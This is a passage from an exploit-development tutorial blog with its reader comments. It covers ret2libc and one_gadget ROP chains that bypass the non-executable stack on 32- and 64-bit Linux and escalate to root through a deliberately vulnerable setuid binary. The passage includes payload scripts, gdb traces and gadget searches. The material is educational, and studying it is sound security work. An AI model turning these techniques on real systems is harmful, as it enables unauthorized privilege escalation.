desta=pack("I",0xffffd240+0x1)        #second byte of setuid arg
destb=pack("I",0xffffd240+0x2)        #third byte of setuid arg
destc=pack("I",0xffffd240+0x3)        #fourth byte of setuid arg
payload = ''
payload+= junk + ecx + pad
payload+= gets + pop + dest
payload+= gets + pop + desta
payload+= gets + pop + destb
payload+= gets + pop + destc
payload+= setuid + pop + pad         #argument for setuid
payload+= system + exit + sh
print payload
set breakpoint at setuid and run it to check if we are correct. Press enter four times as gets will wait for input and empty input means NULL byte.
gdb-peda$ r `python2`
Starting program: /home/virtual/buf `python2`
                                                                                                               ���BBBB ���K���@��� ���K���A��� ���K���B��� ���K���C���`>��K���BBBB`-��p`�� ���
Breakpoint 1, 0x565555a2 in main ()
gdb-peda$ b *setuid
Breakpoint 2 at 0xf7ea3e60
gdb-peda$ c

EAX: 0xffffd243 --> 0xe22d6000 
EBX: 0x42424242 ('BBBB')
ECX: 0xffffffff 
EDX: 0xf7fb68a0 --> 0x0 
ESI: 0x2 
EDI: 0xffffd243 --> 0xe22d6000 
EBP: 0xf7e4c610 (: push   ebp)
ESP: 0xffffd23c --> 0xf7dfe04b (pop    edi)
EIP: 0xf7ea3e60 (: call   0xf7f184b9)
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
   0xf7ea3e5a: xchg   ax,ax
   0xf7ea3e5c: xchg   ax,ax
   0xf7ea3e5e: xchg   ax,ax
=> 0xf7ea3e60 : call   0xf7f184b9
   0xf7ea3e65 <setuid+5>: add    eax,0x11119b
   0xf7ea3e6a <setuid+10>: push   ebx
   0xf7ea3e6b <setuid+11>: sub    esp,0x28
   0xf7ea3e6e <setuid+14>: mov    edx,DWORD PTR [eax+0x3878]
No argument
0000| 0xffffd23c --> 0xf7dfe04b (pop    edi)
0004| 0xffffd240 --> 0x0 
0008| 0xffffd244 --> 0xf7e22d60 (: sub    esp,0xc)
0012| 0xffffd248 --> 0xf7e16070 (: call   0xf7f184b9)
0016| 0xffffd24c --> 0xf7f5c311 ("/bin/sh")
0020| 0xffffd250 --> 0x0 
0024| 0xffffd254 --> 0x995902ae 
0028| 0xffffd258 --> 0xd92fcebe 
Legend: code, data, rodata, value

Breakpoint 2, 0xf7ea3e60 in setuid () from /lib32/
YEAH ! Argument to setuid is now overwritten with NULLs. Continue and you will see it executing /bin/sh. But we still won't get root as we are in gdb. Time to try outside gdb. The addresses that will change outside gdb are the ones on stack that are ecx and address of setuid argument. So I have just added a variable '' to them whose value is the offset outside gdb. run it. You should also check if payload contains 0x20 i.e. the SPACE character, because that can cause the argument to be split in 2 parts, and whole payload may not be copied.
virtual@mecha:~$ python2 
[+] Variables set. Making payload
[+] Payload ready. Exploiting Binary.
[#] Here comes the root shell. Press 'Enter' 4 times !

# id
uid=0(root) gid=1000(virtual) groups=1000(virtual),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),118(lpadmin),128(sambashare)
# whoami
And boom after all we are root.

One more method to bypass non-executable stack is to first make it executable. Yeah we can do that using the 'mprotect()' function. 'mprotect()' changes the access protections for the calling process's memory pages containing any part of the address range in the interval [addr, addr+len-1]. It means you can change the permissions of stack and then execute shellcode from it. This will do in next tutorial. TIll then you can try to do it yourself.

Modern 64 bit Linux

32 bit return to libc was pretty easy, it got little trickier in getting root where you have to set null bytes as argument for setuid. Somehow we did that too. ROP exploitation on 64 bit can make you go nuts at start with functions like strcpy which don't copy null bytes. Why ? It's because of current 48-bit implementation of Canonical form addresses. Read more about it here. 64 bits can provide 264 bytes (16 EB) of virtual address space. However currently only the least significant 48 bits of a virtual address are actually used in address translation. That means addresses from '0000 0000 0000 0000' to '0000 7fff ffff ffff'. So in order to chain instructions we need to fill next 8 bytes on stack with return address which has 2 null bytes at start. 8 bytes because it's 64 bit and it will read next 8 bytes for return address. So chaining isn't possible with functions like strcpy as the chain will break with null bytes in input. It still can be done with bugs like format string exploit which we will learn in future posts or having functions like read(), memcpy(), etc. in code which can copy nullbytes. Okay. So strcpy stops at nullbytes. And we don't have any functions in code which will copy null bytes. That means we can only make it return to just one address. We now need to find one address with such rop-gadget that executes the shell for us. Let us first understand few basic difference between 32 bit and 64 bit assembly and how arguments are passed in 64 bit. I am using this simple code to execute shell. Compiling and executing it will give you shell. Let's load it in gdb and set breakpoint at execve() function call to find the arguments.
virtual@mecha:~$ gcc execve.c -o execve
virtual@mecha:~$ gdb -q execve
Reading symbols from execve...(no debugging symbols found)...done.
gdb-peda$ disas main
Dump of assembler code for function main:
   0x000000000000064a <+0>: push   rbp
   0x000000000000064b <+1>: mov    rbp,rsp
   0x000000000000064e <+4>: mov    edx,0x0
   0x0000000000000653 <+9>: mov    esi,0x0
   0x0000000000000658 <+14>: lea    rdi,[rip+0x95]        # 0x6f4
   0x000000000000065f <+21>: call   0x520 <execve@plt>
   0x0000000000000664 <+26>: nop
   0x0000000000000665 <+27>: pop    rbp
   0x0000000000000666 <+28>: ret    
End of assembler dump.
gdb-peda$ b *main+21
Breakpoint 1 at 0x65f
gdb-peda$ r
Starting program: /home/virtual/execve 

RAX: 0x55555555464a (: push   rbp)
RBX: 0x0 
RCX: 0x0 
RDX: 0x0 
RSI: 0x0 
RDI: 0x5555555546f4 --> 0x68732f6e69622f ('/bin/sh')
RBP: 0x7fffffffe120 --> 0x555555554670 (<__libc_csu_init>: push   r15)
RSP: 0x7fffffffe120 --> 0x555555554670 (<__libc_csu_init>: push   r15)
RIP: 0x55555555465f (<main+21>: call   0x555555554520 <execve@plt>)
R8 : 0x5555555546e0 (<__libc_csu_fini>: repz ret)
R9 : 0x7ffff7de5ee0 (<_dl_fini>: push   rbp)
R10: 0x0 
R11: 0x0 
R12: 0x555555554540 (<_start>: xor    ebp,ebp)
R13: 0x7fffffffe200 --> 0x1 
R14: 0x0 
R15: 0x0
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
   0x55555555464e <main+4>: mov    edx,0x0
   0x555555554653 <main+9>: mov    esi,0x0
   0x555555554658 <main+14>: lea    rdi,[rip+0x95]        # 0x5555555546f4
=> 0x55555555465f <main+21>: call   0x555555554520 <execve@plt>
   0x555555554664 <main+26>: nop
   0x555555554665 <main+27>: pop    rbp
   0x555555554666 <main+28>: ret    
   0x555555554667: nop    WORD PTR [rax+rax*1+0x0]
Guessed arguments:
arg[0]: 0x5555555546f4 --> 0x68732f6e69622f ('/bin/sh')
arg[1]: 0x0 
arg[2]: 0x0 
0000| 0x7fffffffe120 --> 0x555555554670 (<__libc_csu_init>: push   r15)
0008| 0x7fffffffe128 --> 0x7ffff7a161c1 (<__libc_start_main+241>: mov    edi,eax)
0016| 0x7fffffffe130 --> 0x40000 
0024| 0x7fffffffe138 --> 0x7fffffffe208 --> 0x7fffffffe50e ("/home/virtual/execve")
0032| 0x7fffffffe140 --> 0x1f7b987e8 
0040| 0x7fffffffe148 --> 0x55555555464a (<main>: push   rbp)
0048| 0x7fffffffe150 --> 0x0 
0056| 0x7fffffffe158 --> 0xaf6db58595500b01 
Legend: code, data, rodata, value

Breakpoint 1, 0x000055555555465f in main ()
If you look closely now the arguments are actually passed from registers. The first is placed in rdi, the second in rsi, the third in rdx, and then rcx, r8 and r9. Only the 7th argument and onwards are passed on the stack. This is same with all function calls.

Finding One Gadget

Okay back to topic. We can't chain gadgets because of null bytes in address so need to find one gadget that does something like above disassembly, set the registers and call execve for us alone. Again time to search in libc.
virtual@mecha:~$ ldd buf64 | grep libc => /lib/x86_64-linux-gnu/ (0x00007ffff77f3000)
virtual@mecha:~$ strings -tx /lib/x86_64-linux-gnu/ | grep /bin/sh
 1a3f20 /bin/sh
virtual@mecha:~$ objdump -M intel -d /lib/x86_64-linux-gnu/ | grep execve -B5 | grep rdi -C3 | grep 1a3f20 -C3
   d975a: 49 8d 7d 10           lea    rdi,[r13+0x10]
   d975e: e8 4d 6f f4 ff        call   206b0 <*ABS*+0x953c0@plt>
   d9763: 48 8d 3d b6 a7 0c 00  lea    rdi,[rip+0xca7b6]        # 1a3f20 <_libc_intl_domainname@@GLIBC_2.2.5+0x186>
   d976a: 48 89 da              mov    rdx,rbx
   d976d: 4c 89 ee              mov    rsi,r13
   d9770: e8 8b f8 ff ff        call   d9000 <execve@@GLIBC_2.2.5>
   d9a2c: e8 7f 6c f4 ff        call   206b0 <*ABS*+0x953c0@plt>
   d9a31: 48 8b 8d 60 ff ff ff  mov    rcx,QWORD PTR [rbp-0xa0]
   d9a38: 48 8b 55 90           mov    rdx,QWORD PTR [rbp-0x70]
==>d9a3c: 48 8d 3d dd a4 0c 00  lea    rdi,[rip+0xca4dd]        # 1a3f20 <_libc_intl_domainname@@GLIBC_2.2.5+0x186>
   d9a43: 48 89 ce              mov    rsi,rcx
   d9a46: e8 b5 f5 ff ff        call   d9000 <execve@@GLIBC_2.2.5>
   fccd9: e8 52 7b 00 00        call   104830 <__close@@GLIBC_2.2.5>
==>fccde: 48 8b 05 c3 d1 2d 00  mov    rax,QWORD PTR [rip+0x2dd1c3]        # 3d9ea8 <__environ@@GLIBC_2.2.5-0x31b0>
   fcce5: 48 8d 74 24 40        lea    rsi,[rsp+0x40]
   fccea: 48 8d 3d 2f 72 0a 00  lea    rdi,[rip+0xa722f]        # 1a3f20 <_libc_intl_domainname@@GLIBC_2.2.5+0x186>
   fccf1: 48 8b 10              mov    rdx,QWORD PTR [rax]
   fccf4: e8 07 c3 fd ff        call   d9000 <execve@@GLIBC_2.2.5>
   fdb89: e8 a2 6c 00 00        call   104830 <__close@@GLIBC_2.2.5>
==>fdb8e: 48 8b 05 13 c3 2d 00  mov    rax,QWORD PTR [rip+0x2dc313]        # 3d9ea8 <__environ@@GLIBC_2.2.5-0x31b0>
   fdb95: 48 8d 74 24 70        lea    rsi,[rsp+0x70]
   fdb9a: 48 8d 3d 7f 63 0a 00  lea    rdi,[rip+0xa637f]        # 1a3f20 <_libc_intl_domainname@@GLIBC_2.2.5+0x186>
   fdba1: 48 8b 10              mov    rdx,QWORD PTR [rax]
   fdba4: e8 57 b4 fd ff        call   d9000 <execve@@GLIBC_2.2.5>
What I did here ?
  1. Found offset of /bin/sh string.
  2. Disassembled libc and found all execve calls and printed 5 instructions before it.
  3. Piped that output and found rdi string and 3 instructions before and after it.
  4. Piped that output and found refrences of /bin/sh string location.
Observing the instructions we have found 3 such Gadgets(marked by arrow) which should do our work. I also found a tool online which will help you in finding one gadget rop. Download it from here. It's also available in ruby gems. $ gem install one_gadget . It can find even more such ROP gadgets and also show the contraints in arguments. Add the offset of gadget in libc base address and overwrite the return address with it.
gdb-peda$ vmmap
Start              End                Perm Name
0x0000555555554000 0x0000555555555000 r-xp /home/virtual/buf64
0x0000555555754000 0x0000555555755000 r--p /home/virtual/buf64
0x0000555555755000 0x0000555555756000 rw-p /home/virtual/buf64
0x00007ffff79f5000 0x00007ffff7bcb000 r-xp /lib/x86_64-linux-gnu/
0x00007ffff7bcb000 0x00007ffff7dcb000 ---p /lib/x86_64-linux-gnu/
0x00007ffff7dcb000 0x00007ffff7dcf000 r--p /lib/x86_64-linux-gnu/
0x00007ffff7dcf000 0x00007ffff7dd1000 rw-p /lib/x86_64-linux-gnu/
0x00007ffff7dd1000 0x00007ffff7dd5000 rw-p mapped
0x00007ffff7dd5000 0x00007ffff7dfc000 r-xp /lib/x86_64-linux-gnu/
0x00007ffff7fde000 0x00007ffff7fe0000 rw-p mapped
0x00007ffff7ff7000 0x00007ffff7ffa000 r--p [vvar]
0x00007ffff7ffa000 0x00007ffff7ffc000 r-xp [vdso]
0x00007ffff7ffc000 0x00007ffff7ffd000 r--p /lib/x86_64-linux-gnu/
0x00007ffff7ffd000 0x00007ffff7ffe000 rw-p /lib/x86_64-linux-gnu/
0x00007ffff7ffe000 0x00007ffff7fff000 rw-p mapped
0x00007ffffffde000 0x00007ffffffff000 rw-p [stack]
0xffffffffff600000 0xffffffffff601000 r-xp [vsyscall]
gdb-peda$ x/5i 0x00007ffff79f5000+0xfdb8e
 0x7ffff7af2b8e <exec_comm+2366>: mov rax,QWORD PTR [rip+0x2dc313] # 0x7ffff7dceea8
 0x7ffff7af2b95 <exec_comm+2373>: lea rsi,[rsp+0x70]
 0x7ffff7af2b9a <exec_comm+2378>: lea rdi,[rip+0xa637f] # 0x7ffff7b98f20
 0x7ffff7af2ba1 <exec_comm+2385>: mov rdx,QWORD PTR [rax]
 0x7ffff7af2ba4 <exec_comm+2388>: call 0x7ffff7ace000 <execve>

virtual@mecha:~$ python2
$ id
uid=1000(virtual) gid=1000(virtual) groups=1000(virtual),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),118(lpadmin),128(sambashare)
$ whoami
Great we redirected the code execution flow to execute a shell. But what about root, our privileges were dropped ? Since source code contains strcpy() and chaining gadgets will require null bytes on stack to point to correct address I wasn't able to find any one_gadget which will execute both setuid(0) and execve("/bin/sh",0,0) for us. If anyone of you is successful in getting root, do share with us.

Getting root on 64 bit

We have realised that we can't chain gadgets with strcpy() because of nulls. This time we will demonstrate a scenario where vulnerable code uses read() function and chain gadgets to get root. Read can copy null bytes on stack.
virtual@mecha:~$ gcc suid64.c -o suid64 -fno-stack-protector
virtual@mecha:~$ sudo chown root suid64
virtual@mecha:~$ sudo chmod +s suid64
As you can see read copies 200 bytes into buf of size 100 bytes, clearly buffer overflow is possible. Since arguments are passed from registers in 64 bit, our payload now is little different from 32 bit. Argument to setuid must be '0' which is passed from rdi. So we need to somehow get '0' into rdi. Best way is to get it on top of stack and pop it into rdi. Great. So we first need a gadget "pop rdi; ret" then null and then we will call setuid and then execve one_gadget. Our payload will now look like this.
payload = junk + poprdi + null + setuid + onegadget
Here main return address is overwritten with address to "pop rdi;ret". When that is executed null bytes will be on top of stack and will get popped into rdi, forming argument for setuid. Then it will return to setuid which will return to execve one_gadget. Here's a script for that. Remember the tip from previous article for programs with input prompt ?
virtual@mecha:~$ (python2;cat) | ./suid64 
uid=0(root) gid=1000(virtual) groups=1000(virtual),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),118(lpadmin),128(sambashare)
Yeah ! Finally we got root on 64 bit elf executable too and successfully bypassed NX bit.

A tip.

If you try system('/bin/sh') rop gadget chain on 64 bit especially Ubuntu and see the exploit getting segmentation fault in "movaps XMMWORD PTR [rsp+0x40],xmm0" while calling system, it might be because your stack isn't 16 byte aligned. That's just a standard. You may read more about it herehere and here or just google "movaps 16 byte stack alignment". To solve the issue just execute a simple "ret" gadget/instruction. By executing "ret" it will pop off the 8 bytes on top of stack and return to that so it will realign the stack to 16 bytes. So payload will be something like this:
ret = 0x40074f  # address of ret instruction in binary.
p64 = lambda x: pack("Q",x)   #convert to little endian

buf ="A"*120           # junk
buf+=p64(ret)  # <====  execute 'ret' to make stack 16 bytes aligned by popping off 8 bytes off top of stack and returning to it.
buf+=p64(pop_rdi)       # pop rdi;ret
buf+=p64(sh)            # 'sh' goes into rdi
buf+=p64(system)        # system

Sum Up

Finally it's over. This one was pretty long. Actually more than double the last article. So far we have covered classic stack smashing and bypassed the non executable stack on old and modern 32 bit linux, got root, learned about ROP exploitation and finally faced a few problems on modern 64 bit system and still got root with vulnerable functions. Hope you enjoyed learning. If you have any doubts feel free to ask.

Next up

Next up is one more way to bypass non-exec stack by making it executable with mprotect(), format string exploits,bypassing ASLR, ret2got, ret2plt, etc many type of exploits. So stay tuned. Keep practising.

Next Read: Make Stack Executable Again. 


  1. Why do i get "0: Can't open?"

    1. Can you be elaborate more please ? Where are you getting that error ?

    2. When i execute it shows :

      �����: 0: Can't open

    3. Seems like may be you are reaching the one_gadget but wrong parameters are being passed to execve 'sh'. Can you try stepping through each instruction in gdb, and verify if you are reaching the correct addresses ? Also try choosing some other one_gadget.

    4. i fixed it by adding pop rdi;ret twice address before setuid like:
      payload = junk + poprdi + null +poprdi+poprdi+ setuid + onegadget

      it seems that you were right ,wrong parameters were passed

    5. Hi Shivam,

      First of all, these blogs are so AWESOME! Thank you very much for sharing your knowledge.

      Also, I am in the process of setting up my personal blog on Blogger, and I am using StackEdit to write markdown, and export the HTML to Blogger. However, after publishing the content, the text/code usually is not visible in almost every theme applied from Blogger.

      Would you mind to share how you set up your blog on Blogger in details?


    6. Thanks.
      I didn't do much for setting up blog. I just chose an already available theme and added a plugin for text highlighting.

    7. Thanks again Shivam.

      To someone who is trying to follow the exact steps in this blog, if any of the libc functions' address has '\00' bytes in it, e.g. let's say system's address is 0xf7f63200, the exploitation will fail, because strcpy() will stop there. This is what I encountered in my lab (Ubuntu 18.04_kernel 4.15.0, gcc-7.3). I spent hours to debug, so just want to bring it up.

    8. Welcome.
      For that you can use address like 0xf7f63201 and find rop gadgets pop it into a register and dec register. This and a few more ways to work with null bytes I have discussed in next few articles. You can go through them.

  2. Blog is awesome. Please post more, your material is one of the best way to learn. Moreover, you said that there will be the post about unknown libc exploitation ;)

    1. Thanks and sorry, I haven't been able to post for quite some time now. Regarding unknown libc, I may try to complete it in next few weeks. Till then there are some hints to that in next few articles. You can read them.

    2. Hello again, got to this part finally. Many thanks again to your work!

      Just one question, i'm running on Kali x64, and tested with root user:

      for Modern 32 bit ELF Binary(root) & Modern 64 bit Linux(root) parts, after getting to the shell, I see this:
      uid=4158764430 gid=0(root) groups=0(root)
      whoami: cannot find name for user ID 4158764430

      may be you have a clue what does this user id mean?

    3. Well that's strange. It seems some kind of integer overflow or something. Not sure. Are u able to reproduce this ? May be some bug. Will need more details.

    4. Well, I understood what was the problem.
      Before that, I tried to run the same payload as commented before:
      payload = junk + poprdi + null +poprdi+poprdi+ setuid + onegadget
      Because the originaI payload produced: "Can't open".
      So the value of 4158764430 in hexa is 8 lower bytes of the address of pop rdi; that was obviously poped to rdi.
      I changed to: payload = junk + poprdi + null + poprdi + null +setuid + onegadget
      That worked.
      P.S In my machine I used setreuid() gadged instead of setuid()

    5. Oh, I think setreuid() must be causing uid like that. And great, congrats that u could make it work.

  3. Thank you sir for this tutorials, I have a question I noticed a strange behavior that when break pointing on 'main+85' where instruction 'pop ecx' is located I don't see 'system' in stack or the string 'bin/sh' in stack either, after stepping over I do see the 0x42424242 being popped to ecx register which I understand that it will overwrite EIP later. Could you please sir explain to me why I don't see the 'system' and '/bin/sh' string in stack?

    I even tried to replace 0x42424242 with address where shellcode in stack is located.

    1. You need to put system and address of bin/sh on stack yourself with the payload. Read again and see how I found out these and put them in payload. "Time to find unknowns" part.
      Also ECX won't overwrite EIP. The ESP is restored from ECX. See the payload formation part once again.

    2. Yes thats exactly what I did I found the system and exit using by using print:

      gdb-peda$ p system
      $1 = {} 0xf7d46740
      gdb-peda$ p exit
      $2 = {} 0xf7d397d0
      gdb-peda$ find /bin/sh
      Searching for '/bin/sh' in: None ranges
      Found 1 results, display max 1 items:
      libc : 0xf7e83f68 ("/bin/sh")

      So in my payload I have the following:

      "\x90" * 100 + "BBBB" + "\x40\x67\xd4\xf7"+ "\xd0\x97\xd3\xf7" + "\x68\x3f\xe8\xf7" + ret address I got from stack pointing to where '0xf7d397d0 ' is located.

    3. Are these addresses then changed in your stack ? GDB may not sometime resolve them so just see if the addresses are correctly present on stack. Reverify by printing them again. If correct continue executing.

    4. Yes I think the stack changes I noticed a strange behavior sometimes when I run binary with pattern created using:

      pattern_create 200

      And then use it as argument with binary I then find offset using pattern_offset I get a different offset and not 100 and sometimes I get 100 I get 109 as a offset as I am getting offset from ECX address to calculate it. I think maybe the addresses in stack is changing or something. not sure why I am getting this behavior.

    5. I can see the nops and addresses in the stack but I can't see the string '/bin/sh' in the stack showing I did x/s 0xf7e83f68 which is the address of /bin/sh shell but I was not able to see the string there but.

    6. I think the payload is alright cause It is redirecting to the stack:

      Stopped reason: SIGSEGV
      0x90909090 in ?? ()

      One more thing, I tried your address bruteforce script to clear my doubts and It appears that I can't get a shell.
      I event tried to change range.

    7. First of all you don't have to redirect to stack. That's the point of this article that stack is non executable.
      The offset may not be 100 cause some padding may vary on your system. So just calculate it once and it will always be same.
      The bin/sh string won't be on stack. The address of the string will be.
      We are performing ret2libc attack here. So you need to call system function with address of bin/sh string as argument. So the instruction pointer should be getting redirected to the system function in libc. And at that time first argument on stack will be return address for system function and next will be the address of bin/sh string which will be parameter for system function.

    8. Oh I see thank you sir for the explanation I thought the return address in payload suppose to rewrite EIP but you made it clear that its calling system I was lost thank you.
      Okay can you tell me why am I seeing 0x90909090?

      This is the payload I am using, I fixed it as you said:

      "\x90" * 100 + "\xd8\xd2\xff\xff" + "\x40\x67\xd4\xf7"+ "\xd0\x97\xd3\xf7" + "\x68\x3f\xe8\xf7"

      0xffffd2d8 is address that has system address as you said. I found from the the stack.

      Can you please confirm if what I am doing now is right?

    9. Seems correct. Just make sure first address after 100 bytes of any junk (you don't need \x90, see I have just used 'A's) is correct address i.e. ESP+0x4. If it's correct, just execute program in gdb step by step and you will see the control flow. Should get shell.
      Also btw if control flow isn't clear and you aren't sure what's happening or why are we doing like this then may be read again(also try to complete 64 bit part of article too). Search more on google, until you understand why are we doing it like this. Good luck.
      Ret2libc is basic, it will be used in pretty much all further articles.

    10. Hi thank you sir for your help I appreciate it, but I think the address of 'system' and 'exit' functions changes I noticed that those addresses that I added to the payload is not the same anymore. I did a breakpoint on pop ecx and then did 'p system' to look at the address it appears different and did twice to confirm that it changes. I do have ASLR turned off this time. But not sure what makes addresses of function changes?

    11. Check if ASLR in the gdb is turned off. (aslr off). It should be though. Also can you show some example outputs of printing these addresses ? They shouldn't be changing.

    12. Sure this is the output of the addresses being changed:

      gdb-peda$ p system
      $1 = {} 0xf7d3e740
      gdb-peda$ p exit
      $2 = {} 0xf7d317d0
      gdb-peda$ find "/bin/sh"
      Searching for '/bin/sh' in: None ranges
      Found 1 results, display max 1 items:
      libc : 0xf7e7ff68 ("/bin/sh")
      gdb-peda$ r
      Starting program: /root/hackthebox/formatstring/reversing/vuln2

      Restarted the process to see if address will change on the second time and it appears that it is except the string '/bin/sh'.

      gdb-peda$ p system
      $3 = {} 0xf7dab740
      gdb-peda$ p exit
      $4 = {} 0xf7d9e7d0
      gdb-peda$ find "/bin/sh"
      Searching for '/bin/sh' in: None ranges
      Found 1 results, display max 1 items:
      libc : 0xf7e7ff68 ("/bin/sh")
      gdb-peda$ r
      Starting program: /root/hackthebox/formatstring/reversing/vuln2

      Program received signal SIGSEGV, Segmentation fault.

      So after I read your comment about checking ASLR in GDB it appears that aslr is disabled. I checked using the command 'aslr' and this is the output I got:

      gdb-peda$ aslr
      ASLR is OFF

      I also checked ASLR value in /proc/sys/kernel/randomize_va_space the value is 0.

    13. That seems like ASLR is on somehow. You can see this article . That's the pattern addresses change on 32 bit ASLR.
      Though it's strange that address of /bin/sh is still the same. Use vmmap to see process memory maps and check if they are changing. If they are not, try finding offset of system,etc. from libc base and try adding that to libc base from vmmap. Try disas on those addresses too if it's same instructions.
      What system are you using ? May be first of all try to restart the system, then disable ASLR and try again.

    14. You see I already did that, when doing:

      root@sweethome:~/hackthebox/formatstring/reversing# ldd vuln2 (0xf77ae000) => /lib/i386-linux-gnu/ (0xf75a3000)
      /lib/ (0xf77b0000)
      root@sweethome:~/hackthebox/formatstring/reversing# ldd vuln2 (0xf76d6000) => /lib/i386-linux-gnu/ (0xf74cb000)
      /lib/ (0xf76d8000)

      I think the issue is libc base address within the program keeps changing somehow. (vuln2 is the compiled binary)

    15. Well you can clearly see that ASLR isn't actually disabled for your system. Did you try restarting and disabling ASLR again? The addresses with ldd shouldn't change. Look up more ways to disable ASLR until those addresses with ldd stops changing. What system is it btw?

    16. Its a kali linux os virtual machine

    17. Well that should've worked. Did you restart and tried disabling once again ? Or try to see more ways to disable.

    18. Yes I did restarted the machine multiple times I spent so much hours trying to know why the heck I am getting different base addresses for any linux library

      I found this article talking about a CTF I think thits is a mechanism in the system maybe:

    19. Or a good explanation for this maybe perhaps in new linux systems linux libraries is compiled with ASLR -fstack-protector-all flag.

    20. there is a tool called pwntools it can get libc base address but I wonder how does it do that in the background, perhaps it breakpoints the process when entering main and gets the new base image address for the library intended to get its function address .

    21. This is nothing different. He simply has ASLR turned on in his machine. Read this
      Problem with your machine is that ASLR isn't turning off. So try to find more ways to turn off the ASLR or try on a new different machine.

    22. Daaaaaaaaaaamn! Finally I think I found the answer, you are right sir ASLR was not disabling in the system its a bug in kali with kernel 4.12. read this:

      I will upgrade the os kernel and let you know if it is resolved or not.

    23. Thank you sir for your help and I appreciate time you give.

    24. Ohh. Didn't know about this bug. Yeah so upgrade and let me know.
      No need to call me sir btw, I'm just a student.

    25. Yeah bro I appreciate your modesty, and just to confirm that fixed it. Thank you again for your help.

    26. Thanks, I have a question regarding the 64 bit step for the following code:

      How you were able to know the return address for the one gadget should be right after the 'junk' ("AAAAAAA...") without padding or with padding?

      Cause I created a pattern to find the offset and I got different size for the junk 187 bytes and not same as you have in your code 120 bytes why is that?

      I am calculating the offset via RCX, so are we getting offset from RCX or R9 for 64 bit? please correct me if i am wrong.

      Cause when I want to see how many bytes the return address by adding:

      payload = "A" * 187 + "B" * 6

      I get in RCX ==> "0x4241414141414141" ('AAAAAAAB')

      And looking at the stack structure its not the same as 32 bit data inserted in stock from bottom to top I see that its vice versa in 64 bit because I see "0x42424242" at the bottom of the stack and not the top.

    27. You are confusing 32 bit with 64 bit. Did you understand why we used ECX in 32 bit ? Read the disassembly of 32 bit. As I have mentioned in article, ESP is restored from ECX. Now read the disassembly of 64 bit and also my previous article. The RSP is restored from RBP. So use previous article to find offset on 64 bit.
      Also understand when and why we are doing something. The modern 32 bit had a different disassembly so we tackled it that way. So adapt as the disassembly of binary. Don't just use same thing everywhere. Verify why it's done somewhere.

    28. Hi, the blog is really awesome. I have a problem with finding the gadget. I found one gadget and when I run the exploit I get Segmentation Fault. Here is the gadget:

      cbcd8: 00 00
      cbcda: 4c 89 ea mov rdx,r13
      cbcdd: 4c 89 e6 mov rsi,r12
      cbce0: 48 8d 3d 5c e4 0b 00 lea rdi,[rip+0xbe45c] # 18a143 <_libc_intl_domainname@@GLIBC_2.2.5+0x17e>
      cbce7: e8 94 f9 ff ff call cb680

      I really confused. Can ya help me?

    29. Did u use one_gadget tool to find the gadget ? If not u should use it. It might have given multiple so try all. Check the constraints if they are being satisfied when shellcode is being executed. May be add more rop gadgets to shellcode which will satisfy the constraints.
      Else in gdb execute the shellcode step by step for each instruction and see exactly where it's failing.

  4. I have a problem: on the 32 bit version, when the system function is replaced with puts in the payload it runs perfectly (I press enter 4 times then "/bin/sh" is printed) but when i keep the payload with system instead of puts, it runs without problems and there is no core dump but I can t see the shell (after typing enter 4 times it just exits) - when I keep the system function but I change the address of /bin/sh string in any other garbage value, it still does run smoothly, without any kind of error (I tried messing up other parameters and in other cases core dump is generated)
    Any idea why system call is apparently ignored? (in previous examples it works)

    1. Can you check by running or attaching the process in GDB, set breakpoint at payload and execute each instruction (s)tep by step and check whether order is correct and you are reaching into the system ? If you reach successfully into the system, you can still further keep stepping and may be you can see something wrong. You can also run a C program with system call on another terminal as a reference and step into system on both so that u can compare easily where your payload goes wrong.

    2. did that and I also tried creating a sequence with a execl call equivalent with system("/bin/sh") as specified in documentation, it s exactly the same;
      when running in gdb, the payload is writted in the stack unmodified, with the exception of the system call where it replaces the system addr with 0s (0x00000000) and then the exit addr and binsh addr are garbage values; when replacing the system addr with for example puts addr, it suddenly works and payload is delivered sucessfully;
      none of the addresses contain any null character, so it is very weird in my opinion that the payload gets corrupted only in some specific cases

    3. Does your system address or something in payload contain 0x20 . 0x20 is supposed to be a SPACE. So it can cause the payload to be split into 2 arguments, hence we don't want null bytes and also 0x20 in payload. Both are terminating characters.

      If not make sure the gets isn't overwriting the address of system.

    4. yes, the space char is the problem

  5. Hi,

    Will this work if the executable is statically linked ? I am trying the exploit on a statically linked binary

    1. This should work just the main difference is instead of finding gadgets and functions in libc library as done in this article, all those functions are now bundled in the executable, so you have to look for those in the binary itself.

    2. Hi,

      Thank you for your response. I am actually new to this, could you please let me know how I can list the functions/gadgets from the executable ? Also, will I be able to use the same steps in the article - except for the gadgets/functions from libc ?

    3. If you are new then I would suggest following the article first and clear your basics. That way you will understand what is happening at each step. Then tweak and try on your target.

      You can list functions and gadgets from the executable the same way as I did in the article, just instead of wherever path to libc is used in article, replace that with path of your executable.

    4. Thank you for your response. So, I can follow the same steps in the article and instead of pointing to libc, I just point to the executable itself ?

    5. That's mostly it, but if you don't understand the steps, it will be useful to do the exercises in the article first to clear the basics then try on your statically linked executable.

  6. When I tried running, I get a segmentation fault, on debugging using GDB, I see that it is currently in the do_system function. After that it just exits. Could there be an issue in how the "/bin/sh" string is being passed ?

    1. Read the "A tip" section at end of article. Is it segfaulting at movaps instruction ?

  7. Thank you for your response, the segmentation fault is occuring at movaps instruction, I tried searching the executable for the ret and pop rdi instructions and I am unable to locate them, do you have any suggestions for the same ?

    1. You just need "ret" instruction. Every executable with any function should have that.

    2. I searched as mentioned in the article : strings -t x | grep "ret" and it returns random strings and not the actual return instruction, is there anything wrong in the way I am searching ?

    3. That is used to find strings in the executable not instructions. To find instructions, manual way is using objdump or you should just simply use tools like ROPgadget , Ropper, ropsearch in peda, etc. to find rop gadgets.

    4. Thank you for your response ! I was able to find the gadgets using Ropper and modified the payload - i still see a segmentation fault - this time it is in the shell() function, is there anything else which might have caused it to fail ?

    5. Not sure, you gotta debug if you are passing some arguments wrong.

    6. Thank you for your response, just one clarification, it is expected that we should be in the shell() function, right ? Or is that wrong ?

    7. I don't remember ever being in a shell() function. I don't think libc has a function named shell(). It may be some user defined function in your executable. Although it's has been some time, so I am not sure.

    8. Hi,

      I included the ret and pop rdi instructions in the payload and I still get the segmentation fault in the do_system call at movaps instruction. Is there something I am doing wrong ?

